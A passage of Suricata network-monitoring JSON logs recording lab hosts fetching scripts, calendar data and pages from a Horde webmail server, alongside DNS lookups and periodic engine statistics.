Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833}} {"timestamp":"2020-02-29T00:11:43.017305+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622}} {"timestamp":"2020-02-29T00:11:43.047974+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/message-dimp.js","state":"CLOSED","stored":false,"size":10354,"tx_id":8}} {"timestamp":"2020-02-29T00:11:43.048269+0000","flow_id":1202052566297535,"event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","length":0}} {"timestamp":"2020-02-29T00:11:43.053234+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833},"app_proto":"http","fileinfo":{"filename":"\/js\/textarearesize.js","state":"CLOSED","stored":false,"size":2039,"tx_id":5}} {"timestamp":"2020-02-29T00:11:43.053530+0000","flow_id":150206485572827,"event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","length":0}} {"timestamp":"2020-02-29T00:11:43.160141+0000","flow_id":1491464643110889,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:11:44.693232+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34800,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1396,"tx_id":2}} {"timestamp":"2020-02-29T00:11:44.702093+0000","flow_id":1062938575886898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34802,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:11:45.000458+0000","flow_id":760048888043704,"event_type":"flow","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":12,"bytes_toserver":2742,"bytes_toclient":7539,"start":"2020-02-29T00:10:35.055480+0000","end":"2020-02-29T00:10:44.624902+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:45.362391+0000","flow_id":1573653137124388,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34804,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5018},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":22784,"tx_id":0}} {"timestamp":"2020-02-29T00:11:48.000224+0000","event_type":"stats","stats":{"uptime":14360,"capture":{"kernel_packets":134854,"kernel_drops":0},"decoder":{"pkts":134874,"bytes":92994340,"invalid":185,"ipv4":133387,"ipv6":8,"ethernet":134874,"raw":0,"null":0,"sll":0,"tcp":128131,"udp":5056,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2753,"ssn_memcap_drop":0,"pseudo":346,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2769,"synack":2760,"rst":1205,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1794,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2309,"failed_udp":111},"tx":{"http":4621,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2388}},"flow_mgr":{"closed_pruned":2728,"new_pruned":15,"est_pruned":2354,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22485,"memcap_state":0,"memcap_global":0},"http":{"memuse":72030,"memcap":0}}} {"timestamp":"2020-02-29T00:11:48.160966+0000","flow_id":1491464643110889,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/message_source.png","state":"CLOSED","stored":false,"size":119,"tx_id":0}} {"timestamp":"2020-02-29T00:11:48.199209+0000","flow_id":223250995218985,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32212,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:48.307119+0000","flow_id":223250995218985,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58990,"proto":"UDP","dns":{"type":"answer","id":32212,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:48.307119+0000","flow_id":223250995218985,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58990,"proto":"UDP","dns":{"type":"answer","id":32212,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:48.379377+0000","flow_id":299443715105269,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":485}} {"timestamp":"2020-02-29T00:11:48.379377+0000","flow_id":299443715105269,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":78,"tx_id":0}} {"timestamp":"2020-02-29T00:11:49.000760+0000","flow_id":1668915492608187,"event_type":"flow","src_ip":"192.168.10.122","src_port":58818,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:48.579771+0000","end":"2020-02-29T00:06:48.688271+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:52.834518+0000","flow_id":299443715105269,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":735,"tx_id":0}} {"timestamp":"2020-02-29T00:11:52.846418+0000","flow_id":447486943095378,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43778,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:52.954641+0000","flow_id":447486943095378,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40980,"proto":"UDP","dns":{"type":"answer","id":43778,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:52.954641+0000","flow_id":447486943095378,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40980,"proto":"UDP","dns":{"type":"answer","id":43778,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:54.000928+0000","flow_id":397725432354945,"event_type":"flow","src_ip":"192.168.10.122","src_port":45988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:53.530561+0000","end":"2020-02-29T00:06:53.639563+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:55.000261+0000","event_type":"stats","stats":{"uptime":14367,"capture":{"kernel_packets":134889,"kernel_drops":0},"decoder":{"pkts":134892,"bytes":92999998,"invalid":186,"ipv4":133405,"ipv6":8,"ethernet":134892,"raw":0,"null":0,"sll":0,"tcp":128144,"udp":5060,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":346,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1205,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2311,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2390}},"flow_mgr":{"closed_pruned":2728,"new_pruned":15,"est_pruned":2355,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22483,"memcap_state":0,"memcap_global":0},"http":{"memuse":59670,"memcap":0}}} {"timestamp":"2020-02-29T00:11:55.000994+0000","flow_id":1133320201266640,"event_type":"flow","src_ip":"192.168.10.130","src_port":34790,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":29,"pkts_toclient":34,"bytes_toserver":4321,"bytes_toclient":35958,"start":"2020-02-29T00:10:43.157136+0000","end":"2020-02-29T00:10:54.388286+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:55.001212+0000","flow_id":1058609245547071,"event_type":"flow","src_ip":"192.168.10.130","src_port":34792,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1178,"bytes_toclient":824,"start":"2020-02-29T00:10:49.092735+0000","end":"2020-02-29T00:10:54.388780+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:57.953842+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56955,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:58.000468+0000","flow_id":459856429493109,"event_type":"flow","src_ip":"192.168.10.122","src_port":36544,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:56.895861+0000","end":"2020-02-29T00:06:57.004740+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:58.062091+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56955,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:58.062091+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56955,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:58.072837+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47304,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56956,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:11:58.181226+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56956,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:58.181226+0000","flow_id":2200121362976242,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47304,"proto":"UDP","dns":{"type":"answer","id":56956,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:01.000422+0000","flow_id":463232274070173,"event_type":"flow","src_ip":"192.168.10.122","src_port":40239,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:00.719517+0000","end":"2020-02-29T00:07:00.828093+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:01.000669+0000","flow_id":339717604553391,"event_type":"flow","src_ip":"192.168.10.122","src_port":55353,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:00.242351+0000","end":"2020-02-29T00:07:00.351112+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:02.000188+0000","event_type":"stats","stats":{"uptime":14374,"capture":{"kernel_packets":134895,"kernel_drops":0},"decoder":{"pkts":134904,"bytes":93002988,"invalid":187,"ipv4":133417,"ipv6":8,"ethernet":134904,"raw":0,"null":0,"sll":0,"tcp":128151,"udp":5064,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2312,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2392}},"flow_mgr":{"closed_pruned":2730,"new_pruned":15,"est_pruned":2357,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21820,"memcap_state":0,"memcap_global":0},"http":{"memuse":59510,"memcap":0}}} {"timestamp":"2020-02-29T00:12:09.000294+0000","event_type":"stats","stats":{"uptime":14381,"capture":{"kernel_packets":134905,"kernel_drops":0},"decoder":{"pkts":134906,"bytes":93003072,"invalid":187,"ipv4":133417,"ipv6":8,"ethernet":134906,"raw":0,"null":0,"sll":0,"tcp":128151,"udp":5064,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2312,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2392}},"flow_mgr":{"closed_pruned":2730,"new_pruned":15,"est_pruned":2359,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21820,"memcap_state":0,"memcap_global":0},"http":{"memuse":59510,"memcap":0}}} {"timestamp":"2020-02-29T00:12:09.001834+0000","flow_id":20416851390565,"event_type":"flow","src_ip":"192.168.10.122","src_port":49564,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:08.241765+0000","end":"2020-02-29T00:07:08.350330+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:09.001982+0000","flow_id":782648992382295,"event_type":"flow","src_ip":"192.168.10.122","src_port":48718,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:08.048471+0000","end":"2020-02-29T00:07:08.157035+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:12.000464+0000","flow_id":174022061955973,"event_type":"flow","src_ip":"192.168.10.122","src_port":57163,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:11.433029+0000","end":"2020-02-29T00:07:11.541143+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:16.000302+0000","event_type":"stats","stats":{"uptime":14388,"capture":{"kernel_packets":134905,"kernel_drops":0},"decoder":{"pkts":134906,"bytes":93003072,"invalid":187,"ipv4":133417,"ipv6":8,"ethernet":134906,"raw":0,"null":0,"sll":0,"tcp":128151,"udp":5064,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2312,"failed_udp":111},"tx":{"http":4622,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2392}},"flow_mgr":{"closed_pruned":2730,"new_pruned":15,"est_pruned":2362,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_remov